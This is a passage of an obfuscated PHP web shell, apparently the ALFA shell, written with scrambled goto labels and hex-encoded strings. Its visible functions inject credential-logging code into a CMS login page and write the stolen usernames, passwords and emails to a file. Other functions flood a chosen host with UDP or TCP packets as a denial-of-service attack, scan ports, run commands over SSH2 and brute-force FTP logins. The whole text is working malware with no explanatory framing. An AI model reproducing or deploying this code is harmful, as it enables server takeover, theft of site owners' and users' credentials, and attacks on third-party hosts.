\x3b\100\146\167\162\151\x74\145\x28\44\146\x70\61\x2c\x20\44\x61\154\x66\141\137\165\163\x65\162\x6e\x61\x6d\145\x20\56\x20\47\x20\x3a\x20\47\40\56\40\x20\44\x61\154\146\x61\x5f\x70\141\x73\163\167\157\162\x64\56\x22\40\50\x22\x20\56\40\44\x72\157\x77\x5b\x22\145\x6d\141\x69\154\42\135\x20\56\40\x22\x29\x5c\x6e\42\51\73\x40\146\143\x6c\157\x73\145\50\x24\x66\x70\x31\x29\x3b\40\x24\x66\x20\75\x20\100\x66\x69\x6c\145\x28\44\x61\154\x66\141\137\x66\x69\154\x65\51\x3b\44\156\145\x77\40\x3d\40\x61\162\162\141\x79\137\x75\x6e\151\161\165\145\x28\44\146\x29\x3b\x24\146\x70\x20\x3d\40\100\146\157\x70\145\156\x28\x24\x61\x6c\x66\141\x5f\146\151\154\x65\x2c\x20\42\167\42\x29\73\146\x6f\162\145\141\x63\x68\x28\x24\156\x65\x77\x20\x61\x73\x20\x24\166\x61\x6c\x75\x65\163\x29\x7b\100\146\160\165\164\x73\x28\x24\x66\x70\x2c\40\x24\166\x61\154\165\x65\x73\51\73\x7d\x40\x66\x63\154\x6f\x73\145\50\44\x66\x70\51\73\x7d\175"; goto G6C3i; lUgJl: $code = str_replace("\x7b\163\x61\x76\145\164\157\x5f\160\141\164\150\175", $saveto, $code); goto LCotE; C4eZ3: $evil_class = "\164\162\165\145"; goto B9nLw; LCotE: $login = $path . "\57\154\x6f\147\151\x6e\x2e\x70\x68\160"; goto rxL_S; B9nLw: if (@is_file($login) and @is_writable($login) and @is_file($class) and @is_writable($class)) { goto U0cih; OzP5x: if (strstr($data_login, $dologin) and strstr($data_class, $clearpw)) { goto qibOl; iHDsG: $class_replace = str_replace($clearpw, $evil_class, $data_class); goto qBGK2; wfrHx: @file_put_contents($class, $class_replace); goto ajdTv; qibOl: $login_replace = str_replace($dologin, $evil_login, $data_login); goto iHDsG; qBGK2: @file_put_contents($login, $login_replace); goto wfrHx; ajdTv: hijackOutput(0, $saveto); goto NUEjk; NUEjk: } else { hijackOutput(1); } goto RLSzR; U0cih: $data_login = @file_get_contents($login); goto AFjvO; AFjvO: $data_class = @file_get_contents($class); goto OzP5x; RLSzR: } else { hijackOutput(1); } goto Wx36Z; ek5Qn: $evil_login = "\11" . $code . "\12\11" . $dologin; goto C4eZ3; Wx36Z: } goto FRE53; KWEwD: function hijackOutput($c = 0, $p = '') { echo $c == 0 ? "\x3c\x63\145\156\164\145\162\x3e\x3c\146\x6f\156\x74\x20\143\x6f\x6c\x6f\162\75\47\x67\x72\x65\x65\x6e\47\76\x53\165\x63\x63\x65\x73\x73\x3c\57\x66\x6f\156\164\76\x20\x2d\55\76\40\160\141\164\150\72\x20{$p}\74\x2f\x63\145\156\164\x65\162\x3e" : "\x3c\143\x65\156\x74\x65\162\76\x3c\x66\x6f\x6e\164\x20\x63\157\154\157\162\75\x22\x72\x65\x64\42\76\105\x72\x72\x6f\x72\x20\x69\156\x20\151\x6e\x6a\x65\143\164\x20\143\x6f\x64\145\x20\41\x3c\57\146\x6f\x6e\x74\76\x3c\x2f\x63\x65\x6e\164\145\x72\x3e"; } goto lFYVU; SsuhU: function alfados() { goto dZN_V; nyzCr: alfafooter(); goto ISTo6; rPgQp: echo "\x3c\144\151\166\40\x63\x6c\x61\x73\163\x3d\x68\145\x61\x64\x65\162\x3e"; goto eIN6h; Jic7M: echo "\x3c\57\x64\151\166\x3e"; goto nyzCr; dZN_V: alfahead(); goto rPgQp; g8G51: if (!empty($_POST["\141\154\146\x61\61"]) && !empty($_POST["\141\x6c\x66\x61\62"]) && !empty($_POST["\141\154\146\141\x33"])) { goto nv7aG; dkG8C: $max_time = $exec_time + $time; goto D_6Jl; Kfbos: $time = time(); goto dkG8C; D_6Jl: $host = $_POST["\x61\x6c\146\141\61"]; goto c25cl; C86x2: echo "\x3c\x63\x65\156\164\145\162\76{$packets}\x20\x28" . @round($packets * 65 / 1024, 2) . "\x20\x4d\x42\51\40\160\x61\143\x6b\x65\164\163\40\141\166\x65\162\x61\x67\151\x6e\147\40" . @round($packets / $exec_time, 2) . "\x20\x70\141\143\x6b\x65\x74\163\x20\160\x65\x72\x20\x73\145\x63\x6f\x6e\144\x3c\57\143\x65\x6e\x74\x65\x72\76"; goto BPutK; BPutK: echo "\x3c\57\x70\162\145\x3e"; goto VjtwC; JGuVx: $out = str_repeat("\x58", 65000); goto iE9jy; oD3hg: $method = $_POST["\141\154\146\141\64"]; goto JGuVx; MwOU6: $packets = 0; goto P35Ly; iE9jy: while (1) { $packets++; if (time() > $max_time) { break; } $fp = @fsockopen($method . "\x3a\57\x2f" . $host, $port, $errno, $errstr, 5); if ($fp) { fwrite($fp, $out); fclose($fp); } } goto C86x2; P35Ly: ignore_user_abort(true); goto br_Yl; nv7aG: echo __pre(); goto MwOU6; br_Yl: $exec_time = (int) $_POST["\x61\154\146\141\62"]; goto Kfbos; c25cl: $port = (int) $_POST["\x61\x6c\146\141\63"]; goto oD3hg; VjtwC: } goto Jic7M; eIN6h: echo "\x3c\x63\x65\x6e\164\x65\162\x3e\74\160\x3e\74\144\x69\x76\x20\143\154\x61\163\x73\x3d\42\164\x78\x74\146\157\156\164\137\x68\x65\141\144\145\x72\x22\x3e\x7c\40\104\x4f\x53\x20\174\x3c\x2f\144\x69\x76\76\x3c\x2f\x70\x3e\x3c\146\x6f\x72\x6d\x20\x6f\x6e\123\165\x62\x6d\151\x74\x3d\42\147\x28\47\144\x6f\163\x27\54\x6e\x75\154\x6c\x2c\x74\150\x69\163\x2e\150\157\x73\164\56\166\x61\x6c\165\x65\54\164\x68\x69\x73\x2e\x74\x69\155\145\x2e\x76\x61\x6c\x75\x65\x2c\164\x68\x69\x73\56\x70\x6f\162\x74\x2e\166\141\x6c\x75\145\54\x74\150\x69\x73\56\x6d\56\x76\141\154\165\x65\x29\73\x20\x72\145\164\x75\162\x6e\40\146\x61\x6c\x73\145\x3b\42\76\x3c\144\x69\166\40\x63\154\x61\x73\163\75\x22\164\170\x74\146\157\x6e\x74\42\x3e\x4d\x65\164\x68\x6f\144\x20\x3a\40\x3c\x73\x65\x6c\145\x63\164\x20\156\x61\155\145\75\x22\x6d\42\40\x73\164\171\x6c\x65\x3d\x22\x77\x69\x64\164\x68\72\70\x30\160\x78\73\42\76\x3c\x6f\x70\x74\151\x6f\156\x20\x76\x61\x6c\165\145\x3d\x22\165\x64\160\42\x3e\125\104\120\74\x2f\157\x70\164\151\x6f\x6e\76\x3c\157\160\164\x69\157\156\40\x76\x61\x6c\x75\145\75\42\164\143\x70\42\x3e\x54\x43\120\x3c\57\157\x70\x74\x69\157\x6e\x3e\x3c\x2f\163\x65\154\145\143\x74\76\x20\x48\x6f\163\164\40\x3a\40\x3c\151\156\x70\165\x74\40\156\x61\x6d\145\x3d\42\150\x6f\x73\164\42\x20\x74\x79\x70\145\x3d\42\x74\x65\x78\164\42\40\166\x61\154\x75\145\75\42\154\157\x63\x61\x6c\x68\x6f\x73\164\x22\40\163\x69\172\x65\75\42\62\x35\42\40\57\x3e\40\x54\151\155\145\40\x3a\x20\x3c\151\156\x70\165\x74\40\156\141\x6d\145\x3d\42\164\x69\155\x65\x22\40\x74\x79\160\145\75\x22\x74\x65\170\164\42\x20\163\151\x7a\x65\x3d\42\x31\65\x22\40\x2f\76\40\120\x6f\162\x74\x20\72\40\74\151\156\160\165\x74\40\x6e\141\x6d\x65\75\42\x70\157\162\164\x22\x20\164\171\160\x65\x3d\42\164\x65\x78\164\42\x20\163\x69\172\145\75\x22\61\60\42\x20\x2f\x3e\40\74\151\156\160\x75\x74\40\x74\171\x70\145\75\x22\x73\x75\x62\155\151\x74\42\40\166\141\x6c\x75\145\75\42\40\x22\x20\x2f\76\74\x2f\x64\151\x76\76\74\x2f\x66\157\x72\x6d\76\74\x2f\x63\x65\156\164\x65\x72\76\x3c\x62\162\x3e"; goto g8G51; ISTo6: } goto bdXxs; wc9n7: function alfaportscanner() { goto YMSP3; YkTcV: $host = strip_tags($_POST["\141\x6c\146\141\64"]); goto Mqavg; G9Tm8: $end = strip_tags($_POST["\x61\x6c\x66\141\x33"]); goto YkTcV; DlhWW: $start = strip_tags($_POST["\141\154\146\141\x32"]); goto G9Tm8; YMSP3: alfahead(); goto sbn23; Mqavg: if (isset($_POST["\141\x6c\146\141\x34"]) && is_numeric($_POST["\141\x6c\146\x61\x33"]) && is_numeric($_POST["\x61\154\x66\x61\x32"])) { goto LjzqZ; IE0kw: $packetContent = "\x47\105\124\x20\x2f\40\110\x54\124\x50\x2f\x31\56\x31\15\xa\15\12"; goto dY2jr; dY2jr: if (ctype_xdigit($packetContent)) { $packetContent = @pack("\x48\52", $packetContent); } else { $packetContent = str_replace(array("\15", "\12"), '', $packetContent); $packetContent = str_replace(array("\x5c\x72", "\134\x6e"), array("\xd", "\12"), $packetContent); } goto YCZ4X; YCZ4X: for ($i = $start; $i <= $end; $i++) { $sock = @fsockopen($host, $i, $errno, $errstr, 3); if ($sock) { goto RDCfn; kO0xF: $maxtry = 1; goto CC32G; HM1nE: echo "\74\x70\76\x3c\x74\145\170\x74\141\162\145\x61\x20\163\x74\171\154\145\x3d\47\x68\145\x69\x67\150\x74\72\61\x34\x30\160\170\x3b\167\151\144\164\150\x3a\65\60\45\x3b\x27\x3e" . $bin . "\x3c\x2f\164\x65\170\164\141\162\x65\141\76\74\x2f\160\76\74\57\143\145\x6e\x74\x65\162\x3e"; goto zSQXf; rP_79: do { $line = fgets($sock, 1024); if (trim($line) == '') { $counter++; } $bin .= $line; } while ($counter < $maxtry); goto cl3VY; cl3VY: fclose($sock); goto g4O6w; RDCfn: stream_set_timeout($sock, 5); goto ECiHz; xmHYs: $counter = 0; goto kO0xF; ECiHz: fwrite($sock, $packetContent . "\15\xa\15\xa\0"); goto xmHYs; g4O6w: echo "\74\143\145\x6e\x74\x65\162\x3e\74\160\x3e\120\x6f\162\164\x20\x3c\146\x6f\156\x74\x20\163\164\x79\154\145\75\47\143\x6f\154\157\162\x3a\x23\x44\105\x33\x45\x33\x45\x27\x3e{$i}\74\57\146\157\156\x74\76\x20\151\x73\40\157\x70\x65\x6e\74\57\x70\76"; goto HM1nE; CC32G: $bin = ''; goto rP_79; zSQXf: } flush(); } goto HsOXt; LjzqZ: echo __pre(); goto IE0kw; HsOXt: } goto QoHEU; QoHEU: echo "\x3c\x2f\x64\151\166\x3e"; goto b7Ser; b7Ser: alfafooter(); goto Rv9_T; sbn23: echo "\74\x64\x69\166\40\x63\x6c\141\163\x73\75\150\x65\141\x64\x65\162\x3e\74\x63\x65\156\x74\145\162\x3e\x3c\x70\x3e\x3c\x64\151\166\40\x63\154\x61\163\x73\x3d\x22\164\170\164\146\x6f\x6e\164\x5f\x68\145\141\x64\x65\x72\42\x3e\x7c\x20\120\157\x72\x74\40\x53\143\141\156\145\162\x20\174\74\x2f\144\x69\166\x3e\x3c\x2f\160\x3e\xd\12\74\x66\x6f\162\x6d\40\141\x63\164\x69\x6f\x6e\x3d\42\x22\40\155\145\164\150\157\x64\x3d\42\160\x6f\x73\164\x22\x20\157\156\163\x75\142\155\x69\x74\x3d\42\x67\50\47\x70\x6f\162\x74\163\143\141\156\156\x65\162\x27\54\x6e\165\154\154\x2c\156\165\x6c\154\54\164\x68\x69\x73\56\x73\x74\x61\x72\x74\56\166\x61\154\x75\x65\54\x74\x68\x69\x73\56\145\x6e\x64\56\x76\141\x6c\x75\x65\54\x74\150\151\x73\x2e\150\x6f\x73\x74\56\x76\x61\154\165\x65\51\73\40\x72\x65\164\165\162\x6e\x20\146\x61\154\163\145\73\x22\76\15\xa\74\x69\156\160\x75\164\40\x74\x79\x70\145\x3d\42\150\x69\144\x64\x65\x6e\42\40\x6e\141\155\x65\75\42\171\42\40\x76\x61\x6c\165\x65\75\42\x70\150\x70\x74\x6f\157\x6c\163\42\x3e\xd\xa\x3c\x64\151\x76\40\143\x6c\x61\x73\x73\x3d\42\164\170\x74\146\x6f\156\164\x22\x3e\110\x6f\163\164\72\40\x3c\57\x64\151\x76\x3e\x20\x3c\151\156\160\x75\164\x20\x69\x64\x3d\42\164\x65\x78\x74\x22\x20\x74\171\x70\145\75\x22\x74\x65\x78\164\42\x20\x6e\x61\x6d\x65\x3d\42\150\157\163\164\x22\x20\x76\141\154\x75\x65\x3d\42\154\x6f\x63\x61\154\150\157\163\164\42\x2f\x3e\xd\12\x3c\x64\x69\166\x20\143\154\x61\x73\x73\75\42\x74\170\164\146\x6f\156\164\x22\76\120\x6f\162\x74\x20\x73\x74\141\x72\x74\x3a\x20\x3c\57\144\151\166\76\40\74\151\x6e\x70\165\x74\40\151\x64\75\42\x74\x65\170\164\x22\x20\x73\151\x7a\145\75\x22\x35\x22\40\164\171\x70\145\x3d\x22\164\145\x78\x74\x22\40\x20\156\141\155\145\x3d\42\163\x74\141\x72\x74\x22\x20\166\141\x6c\x75\145\75\x22\x38\x30\x22\57\76\xd\xa\74\x64\151\166\40\x63\154\x61\163\x73\75\x22\164\170\164\x66\x6f\156\x74\x22\x3e\x50\157\x72\x74\x20\x65\x6e\x64\72\40\74\57\144\151\x76\x3e\40\x3c\x69\156\x70\x75\x74\40\151\144\x3d\42\164\x65\170\x74\42\x20\163\x69\172\145\x3d\x22\65\42\40\164\x79\x70\145\x3d\x22\x74\x65\170\x74\42\x20\156\141\x6d\145\x3d\42\145\x6e\144\42\40\166\141\x6c\165\145\75\42\70\x30\42\x2f\x3e\40\74\x69\156\160\165\164\x20\x74\171\160\x65\x3d\x22\163\x75\x62\155\x69\164\42\40\x76\141\154\x75\x65\75\42\40\42\40\57\x3e\xd\xa\x3c\57\146\x6f\162\155\76\x3c\57\x63\145\156\164\145\162\x3e\x3c\x62\162\76"; goto DlhWW; Rv9_T: } goto YuoxJ; Sr2OM: function __read_file($file, $boom = true) { goto QGzB0; Ve70W: return $content; goto DqQgN; WD5uj: if (empty($content) || !$content) { $content = alfaEx("\x63\141\164\x20\x27" . addslashes($file) . "\x27"); } goto Ve70W; bwA8Z: if ($fh = @fopen($file, "\x72\142")) { $content = ''; while (!feof($fh)) { $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192); } } goto WD5uj; QGzB0: $content = false; goto bwA8Z; DqQgN: } goto K_RmO; ZHVU5: foreach ($_POST as $key => $value) { if (is_array($_POST[$key])) { $i = 0; foreach ($_POST[$key] as $f) { goto SNeop; SNeop: $f = trim(str_replace("\x20", "\53", $f)); goto XeEwn; d6KaR: $i++; goto gmt98; XeEwn: $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey()); goto d6KaR; gmt98: } } else { $value = trim(str_replace("\40", "\53", $value)); $_POST[$key] = decrypt_post($value, _AlfaSecretKey()); } } goto FCCSU; FCCSU: $default_action = "\x46\x69\154\145\163\x4d\x61\x6e"; goto i_Ftg; kWOwO: date_default_timezone_set("\101\x73\x69\141\57\x54\x65\x68\162\x61\156"); goto cLCU3; rI1gc: function Alfa_FTPC($info) { if ($con = @ftp_connect($info["\164\x61\x72\147\x65\164"], $info["\x70\157\162\x74"])) { if ($con) { $login = @ftp_login($con, $info["\x75\163\x65\x72\156\x61\x6d\145"], $info["\160\141\x73\163\167\157\162\x64"]); if ($login) { CrackerResualt($info); } } } @ftp_close($con); } goto ZDeKS; oberm: function alfassh2() { if (function_exists("\163\163\150\62\137\x63\157\x6e\156\x65\x63\x74")) { goto v1KXG; mixVQ: $ssh_command = $_POST["\x61\154\x66\x61\x35"]; goto jKiqx; Uyjb6: if ($_SESSION["\143\x6f\x6e\x6e\145\x63\164\145\x64"] !== true) { goto TFzgB; atUMQ: echo "\74\x66\157\162\x6d\x20\156\x61\155\145\x3d\x27\x73\163\x68\62\47\x20\x6d\145\164\150\157\x64\75\47\160\x6f\163\164\47\x20\157\156\x73\165\x62\155\151\x74\75\47\147\50\42\163\x73\x68\x32\x22\54\x6e\165\x6c\x6c\54\164\150\x69\163\x2e\163\x73\150\x5f\151\160\x2e\166\141\x6c\x75\x65\x2c\x74\x68\x69\x73\x2e\x73\163\x68\x5f\x6c\x6f\147\151\156\x2e\166\x61\x6c\165\x65\x2c\x74\x68\x69\x73\x2e\163\163\150\x5f\x70\x61\x73\163\56\166\x61\154\165\x65\54\164\150\x69\x73\x2e\163\x73\150\137\x70\157\x72\x74\56\166\x61\154\x75\x65\x29\73\x20\162\x65\164\165\x72\156\40\146\x61\x6c\163\145\x3b\x27\x3e\x3c\x74\141\x62\x6c\145\x20\x63\145\154\154\160\141\x64\x64\x69\x6e\x67\x3d\47\62\47\x20\x63\x65\x6c\x6c\x73\x70\x61\x63\x69\x6e\147\75\47\60\x27\x3e\x3c\x74\x72\x3e\74\164\144\76\x3c\x66\x6f\156\x74\40\x63\x6f\154\157\x72\x3d\42\x23\146\146\146\x66\146\146\42\x3e\74\142\76\x49\120\x3c\57\x62\76\x3c\x2f\x66\x6f\x6e\x74\76\74\57\164\x64\76\74\x74\x64\76\x3c\146\x6f\x6e\x74\x20\143\157\x6c\157\162\x3d\x22\x23\146\x66\x66\146\x66\x66\x22\76\x3c\x62\76\123\123\110\x20\x55\x53\105\x52\x3c\57\x62\x3e\x3c\57\x66\157\x6e\164\76\74\57\x74\x64\x3e\x3c\x74\x64\x3e\74\x66\157\x6e\164\40\143\x6f\x6c\157\162\x3d\42\x23\146\x66\x66\x66\146\x66\x22\x3e\x3c\x62\x3e\x53\x53\x48\x20\120\101\x53\x53\x3c\x2f\x62\x3e\74\x2f\x66\157\x6e\164\x3e\x3c\57\164\x64\76\x3c\164\x64\x3e\x3c\x66\157\156\164\40\143\x6f\154\x6f\x72\x3d\42\x23\x66\146\x66\x66\x66\x66\42\76\74\x62\76\x53\123\x48\40\x50\117\x52\x54\x3c\57\x62\76\74\x2f\x66\157\x6e\x74\x3e\x3c\57\164\144\76\74\x74\144\x3e\x3c\x2f\x74\x64\76\x3c\57\164\162\76\74\x74\162\76\x3c\164\144\76\74\151\x6e\x70\x75\x74\40\164\x79\160\145\x3d\x74\145\170\164\40\156\x61\155\145\x3d\x73\163\x68\x5f\151\x70\x20\166\x61\x6c\x75\145\75\47\47\76\x3c\x2f\164\144\76\x3c\x74\x64\76\74\x69\156\x70\x75\164\40\x74\171\x70\x65\x3d\x74\x65\x78\x74\x20\x6e\141\x6d\145\x3d\x73\163\x68\x5f\154\157\x67\x69\156\40\166\141\154\165\145\x3d\47\47\x3e\74\x2f\x74\x64\76\x3c\x74\x64\76\74\151\x6e\160\165\164\40\x74\171\x70\145\x3d\x74\145\x78\x74\40\156\141\155\145\x3d\163\x73\x68\137\160\x61\163\x73\40\x76\141\154\165\145\75\47\47\x3e\x3c\x2f\x74\144\x3e\74\x74\144\x3e\x3c\x69\156\160\x75\164\40\x74\171\160\x65\x3d\x74\x65\170\164\x20\156\x61\x6d\x65\75\x73\163\150\137\x70\x6f\162\164\x20\x76\141\x6c\x75\x65\x3d\x27\47\x3e\x3c\57\164\x64\x3e\74\x74\x64\76\74\151\x6e\160\165\x74\40\x74\x79\x70\x65\x3d\x27\163\x75\x62\x6d\x69\164\x27\40\156\141\155\145\75\47\163\165\142\155\151\164\x27\40\x76\141\154\165\145\75\x27\40\47\x3e\74\57\164\144\x3e\74\x2f\164\141\x62\x6c\145\x3e\x3c\57\x66\x6f\x72\155\76\x3c\57\144\x69\x76\76"; goto Pcxup; TFzgB: alfahead(); goto Pnlev; Pcxup: alfafooter(); goto Ge8Rk; Pnlev: echo "\x3c\x64\151\x76\x20\143\x6c\141\x73\163\75\x68\x65\x61\144\x65\162\76"; goto atUMQ; Ge8Rk: } goto DTpOE; xJnqt: $ssh_pass = $_POST["\x61\x6c\146\x61\63"]; goto mWS5U; t3ux0: $ssh_ip = $_POST["\x61\154\146\141\x31"]; goto fcujx; mWS5U: $ssh_port = $_POST["\x61\x6c\x66\x61\x34"]; goto mixVQ; jKiqx: if ($alfaconnect2ssh = @ssh2_connect($ssh_ip, $ssh_port)) { if ($alfalogin = @ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass)) { $_SESSION["\x63\157\156\156\x65\143\164\x65\144"] = true; } } goto Uyjb6; v1KXG: $_SESSION["\x63\x6f\156\156\x65\143\x74\145\144"] = false; goto t3ux0; fcujx: $ssh_login = $_POST["\x61\x6c\146\141\x32"]; goto xJnqt; DTpOE: if ($_SESSION["\143\157\156\x6e\145\143\164\145\144"] == true) { goto DSpqf; X4ClQ: echo "\74\144\151\166\x20\x63\154\x61\163\163\75\x68\x65\x61\144\x65\162\x3e"; goto Q2L4r; ijBIE: if ($_POST["\x61\x6c\x66\x61\x36"] == "\x3e\x3e") { goto xGihJ; pkAI5: ob_start(); goto AmyzO; AmyzO: echo stream_get_contents($output); goto kVDD9; kVDD9: echo htmlspecialchars(ob_get_clean()); goto bDHXZ; xGihJ: echo "\x3c\x70\x72\145\x20\143\154\141\163\163\75\x6d\x6c\x31\76"; goto pkAI5; bDHXZ: } goto Ae82G; Q2L4r: echo "\74\146\157\162\x6d\40\156\x61\155\x65\x3d\x27\x73\163\150\x32\47\x20\155\145\x74\150\157\144\x3d\x27\x70\157\x73\164\x27\40\157\156\163\x75\x62\x6d\151\x74\75\47\147\50\x22\x73\x73\x68\62\42\x2c\x6e\x75\x6c\x6c\54\x22" . $ssh_ip . "\42\54\x22" . $ssh_login . "\42\x2c\42" . $ssh_pass . "\x22\54\42" . $ssh_port . "\x22\x2c\x74\x68\151\x73\x2e\163\163\x68\x5f\143\157\155\x6d\x61\156\x64\x2e\166\141\154\x75\x65\54\42\76\x3e\42\x29\x3b\x20\x72\x65\164\x75\x72\156\40\146\x61\x6c\x73\145\x3b\x27\x3e\74\164\141\x62\x6c\145\x20\143\145\x6c\x6c\x70\x61\x64\x64\x69\x6e\x67\x3d\47\62\47\x20\143\x65\x6c\154\x73\x70\141\143\151\x6e\x67\75\47\60\x27\x3e\x3c\x74\x72\76\x3c\164\x64\x3e\74\151\156\x70\x75\x74\40\x74\171\160\145\75\x74\145\x78\x74\x20\x6e\141\x6d\145\x3d\163\163\150\137\x63\x6f\x6d\155\x61\156\x64\40\x76\x61\154\x75\x65\x3d\x27\47\76\x3c\x2f\x74\144\x3e\x3c\x74\144\76\x3c\x69\156\x70\x75\x74\x20\164\171\160\x65\75\x27\x73\165\x62\x6d\151\x74\x27\40\x6e\x61\x6d\x65\75\47\145\x78\x65\143\x75\x74\x65\47\x20\x76\141\x6c\165\145\x3d\x27\40\x27\76\74\x2f\164\144\76\74\57\x74\x61\142\154\145\x3e\74\57\x66\x6f\162\155\x3e\74\x66\x6f\162\155\x20\156\x61\155\x65\x3d\47\163\x73\150\62\47\x20\155\145\x74\150\x6f\144\75\47\160\157\x73\164\47\40\157\156\163\165\142\x6d\x69\x74\75\x27\147\x28\134\47\x73\x73\150\62\134\x27\54\156\165\154\154\x2c\134\47\x5c\x27\54\x5c\47\x5c\x27\x2c\x5c\x27\134\47\51\73\40\x72\x65\164\x75\162\x6e\x20\x66\x61\x6c\163\145\x3b\x27\76\x3c\x69\156\x70\x75\164\x20\164\171\x70\x65\75\163\x75\142\155\151\x74\40\156\x61\155\145\x3d\x27\144\x65\x73\164\x73\x65\x73\x73\x69\157\x6e\47\x20\166\x61\154\165\145\x3d\47\154\x6f\147\x6f\x75\164\47\76\x3c\x2f\146\x6f\x72\155\76"; goto cq4I4; Ae82G: echo "\x3c\57\144\151\166\x3e"; goto h6msp; cq4I4: $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command); goto ZH4A4; DSpqf: alfahead(); goto X4ClQ; ZH4A4: stream_set_blocking($alfastream, true); goto urL0L; urL0L: $output = ssh2_fetch_stream($alfastream, SSH2_STREAM_STDIO); goto ijBIE; h6msp: alfafooter(); goto pNsGR; pNsGR: } goto i_UhK; i_UhK: } else { goto bvYK2; TNKIL: alfafooter(); goto Rl6BC; AJnU6: echo "\x3c\x64\x69\166\x20\143\154\x61\163\x73\75\150\145\141\144\145\x72\x3e\74\x70\76\x3c\143\145\x6e\164\x65\x72\76\74\142\x3e\x3c\x66\x6f\x6e\x74\x20\143\x6f\x6c\157\162\x3d\42\x72\145\144\42\76\123\x65\162\x76\x65\x72\40\144\x6f\145\x73\x20\x6e\x6f\164\40\163\165\160\160\157\162\164\x20\123\123\110\x32\74\x2f\146\x6f\156\x74\x3e\74\x70\x3e\74\x2f\142\76\x3c\57\x63\145\156\164\x65\162\76\74\x2f\144\151\x76\x3e"; goto TNKIL; bvYK2: alfahead(); goto AJnU6; Rl6BC: } } goto UNM1M; zatc1: $XDmfxOnhck = "\x66\x75" . "\156\x63\x74" . "\151\157\x6e" . "\x5f" . "\145" . "\x78" . "\x69\163" . "\x74\163" . ''; goto RFckQ; gM0bI: function alfasafe() { goto L4Keo; iVAwS: echo "\x3c\142\162\76\x3c\57\x64\151\x76\76"; goto Kux6T; k64wG: if (!empty($_POST["\141\154\146\141\x36"]) && isset($_POST["\141\x6c\x66\141\66"]) == "\x76\141\x6c\x69\x61\163\x65\163") { echo "\15\12\74\146\x6f\x72\155\x20\x6f\156\x73\165\142\155\x69\x74\75\42\x67\x28\47\x73\141\x66\x65\x27\54\156\x75\154\154\54\156\x75\x6c\x6c\54\x6e\165\x6c\154\x2c\x6e\165\x6c\154\x2c\156\x75\154\x6c\x2c\x6e\x75\154\x6c\x2c\x27\x76\141\154\x69\x61\163\x65\163\x27\x2c\164\150\x69\163\56\163\x69\164\145\x2e\x76\x61\154\x75\x65\54\156\165\x6c\x6c\x2c\x27\x3e\x3e\47\51\x3b\40\x72\x65\164\165\x72\x6e\x20\x66\141\x6c\163\145\x3b\42\x20\155\x65\x74\x68\x6f\x64\75\x22\x70\x6f\x73\x74\x22\40\57\x3e\x3c\x63\145\x6e\164\x65\x72\x3e\x3c\x64\151\x76\x20\x63\x6c\x61\163\163\75\x22\x74\170\164\146\x6f\x6e\164\42\x3e\125\x72\x6c\x3a\x20\74\57\x66\x6f\156\164\x3e\x3c\151\x6e\160\165\x74\x20\164\171\x70\145\x3d\x22\x74\145\170\164\x22\x20\x70\154\141\x63\145\x68\x6f\154\144\x65\162\75\x22\x73\x69\x74\x65\x2e\x63\x6f\155\x22\40\x6e\141\x6d\x65\x3d\x22\163\x69\x74\x65\42\40\57\76\x20\74\x69\156\160\x75\x74\40\x74\x79\160\x65\75\42\x73\x75\142\155\151\164\42\40\x76\x61\x6c\x75\x65\x3d\x22\40\x22\40\156\141\155\145\x3d\x22\147\157\42\x20\x2f\76\74\x2f\146\157\x72\x6d\76\74\x2f\x63\145\156\164\x65\162\x3e"; if (isset($_POST["\141\x6c\146\141\71"]) && $_POST["\141\154\146\x61\71"] == "\76\x3e") { if (!_alfa_file_exists("\57\145\164\x63\x2f\x76\151\162\x74\165\x61\154\57\x64\x6f\x6d\x61\151\156\x6f\167\x6e\145\162\x73")) { goto VpBbx; a1Hvk: if (!empty($user) && $user != "\162\157\x6f\x74") { echo __pre() . "\x3c\143\x65\156\x74\145\x72\x3e\x3c\x74\x61\142\x6c\x65\x20\142\157\162\x64\145\162\x3d\x27\61\47\76\74\x74\x72\x3e\74\164\x64\76\x3c\142\x3e\74\x66\157\156\x74\40\x63\157\154\x6f\162\75\42\43\x46\106\x46\106\x46\x46\42\76\x55\163\145\x72\72\40\x3c\57\142\76\74\x2f\x66\157\156\164\x3e\74\x2f\164\x64\x3e\74\x74\144\76\74\142\76\74\x66\157\156\164\40\143\x6f\154\x6f\162\x3d\x22\x23\x46\x46\x30\x30\60\60\42\x3e{$user}\74\x2f\146\157\156\164\x3e\x3c\57\x62\76\x3c\57\164\x64\76\74\x2f\x74\x72\76\x3c\x74\x72\76\74\x74\x64\76\x3c\142\76\x3c\x66\157\156\x74\x20\143\157\154\x6f\162\75\x22\43\x46\x46\x46\x46\106\x46\42\76\x73\151\x74\145\72\40\74\57\142\76\x3c\57\x66\x6f\156\x74\76\x3c\57\x74\x64\x3e\74\164\x64\76\x3c\142\76\x3c\x66\157\156\164\40\x63\157\x6c\x6f\x72\75\x22\43\x46\106\x30\x30\60\60\42\76{$rep}\74\57\146\x6f\156\x74\x3e\x3c\57\142\x3e\74\x2f\164\144\x3e\x3c\x2f\164\162\76\74\57\x74\x61\x62\x6c\x65\x3e\x3c\x2f\x63\145\x6e\164\145\x72\76"; } else { echo __pre() . "\74\143\145\156\164\145\162\76\74\x62\76\116\x6f\x20\163\165\143\150\40\146\x69\154\145\x20\x6f\162\x20\x64\x69\162\145\143\x74\x6f\162\x79\40\x4f\x72\40\104\x69\x73\x61\x62\x6c\x65\40\x46\x75\x6e\x63\164\x69\x6f\156\163\40\x69\163\40\x6e\x6f\164\40\116\x4f\x4e\105\56\x2e\x2e\74\x2f\142\x3e\74\x2f\x63\145\x6e\164\145\x72\76"; } goto YoSfc; cBy6x: $rep = str_replace(array("\x68\164\164\x70\x73\x3a\57\x2f", "\x68\164\164\x70\72\x2f\57", "\x77\x77\x77\x2e"), '', $site); goto RDUAA; RDUAA: $user = ''; goto V52zt; VpBbx: $site = trim($_POST["\x61\x6c\x66\x61\x37"]); goto cBy6x; V52zt: if (function_exists("\160\157\x73\x69\x78\137\147\145\164\x70\167\165\151\x64") && function_exists("\x66\x69\154\x65\x6f\167\x6e\x65\x72")) { if ($user = @posix_getpwuid(@fileowner("\x2f\145\x74\143\57\166\x61\x6c\151\141\163\145\x73\x2f{$rep}"))) { $user = $user["\x6e\x61\x6d\x65"]; } } else { if (_alfa_can_runCommand(true, true)) { $user = alfaEx("\x73\164\x61\x74\x20\x2d\143\x20\47\x25\x55\47\x20\x2f\145\x74\143\x2f\x76\141\x6c\151\x61\163\x65\x73\x2f" . $rep); } } goto a1Hvk; YoSfc: } else { goto 